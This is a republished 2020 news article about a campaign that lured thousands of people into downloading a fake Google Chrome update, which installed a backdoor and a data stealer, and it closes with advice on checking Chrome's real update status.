Hackers Trick Thousands Into Downloading Dangerous ‘Google Chrome Update’

Researchers from the Russian 'Doctor Web' virus laboratory have issued a warning after discovering thousands of victims have been tricked into downloading a dangerous backdoor that is disguised as an update to Google Chrome.


Updates and upgrades have been in the news a lot this last week, with Microsoft confirming unprecedented changes to Windows 10 updates and WhatsApp users being warned about an upgrade warning that isn't what it seems. As reported by Kate O'Flaherty, March 19, Google has already paused all upcoming Chrome releases as the impact of the COVID-19 pandemic causes adjusted work schedules for developers. Google has also decided to skip the next point release, which was due to be Chrome 82. However, Google has confirmed that it will "continue to prioritize any updates related to security." Now Google Chrome users are being warned to watch out for what the security researchers who uncovered it describe as a "dangerous backdoor" that is disguised as, you guessed it, a Chrome update.


Experienced hackers are behind the fake Google Chrome Update

In a March 25 Doctor Web blog posting, the researchers warn that the convincing Google Chrome update download is being linked to from multiple WordPress-powered sites that have been compromised by hackers. Those pages, including everything from news blogs to official corporate sites, have been hit by a threat actor with a history of successful hacking campaigns. "The hacker group behind this attack was previously involved in spreading a fake installer of the popular VSDC video editor through its official website and the CNET software platform," they say, adding that on this occasion, the hackers got administrative control of multiple sites to create the chain of infection. Once admin access to the sites was achieved, the cybercriminals embedded a malicious JavaScript redirection script that sends visitors straight to what appears to be a legitimate Google Chrome update page.


Sophisticated data-stealer comes as part of this dangerous package

This is, of course, far from legitimate and is actually a malware installer file. A file that has been downloaded more than 2,000 times, according to Doctor Web researchers. Once the file is executed, a TeamViewer remote control application is installed along with password-protected archives that contain files that the threat actors use to obfuscate the malware from Windows antivirus protection. Further malware payloads can then also be delivered, including a keylogger and a sophisticated Russian-based data stealer. That stealer, known as Predator the Thief, has been active for the last 18 months. It is known to use anti-debugging and anti-analysis techniques to frustrate detection and analysis by researchers.


Mitigation advice for Google Chrome users

Beside investing in a solid 'Keyboard Encryption' software package, if you are a Google Chrome web browser user, remember that Chrome was actually the first to include the feature of automatically updating itself. It will regularly check for any updates and these will be applied when you start the application. You can check you have the latest version, which is 80.0.3987.149 as of March 26, by going to Help|About Google Chrome from the "three dots" dropdown menu in the top right-hand corner of the browser. If, for whatever reason, you are not running the latest version, this will also kickstart the update process. You will never genuinely be redirected to a web page where you are asked to download an update from Google.


Forbes - March 2020.

© 2023 by Proven WebDesigns.

16312198491

Public Wi-Fi Security

Keep up to Date, Subscribe Now...

  • Facebook
  • LinkedIn
  • Twitter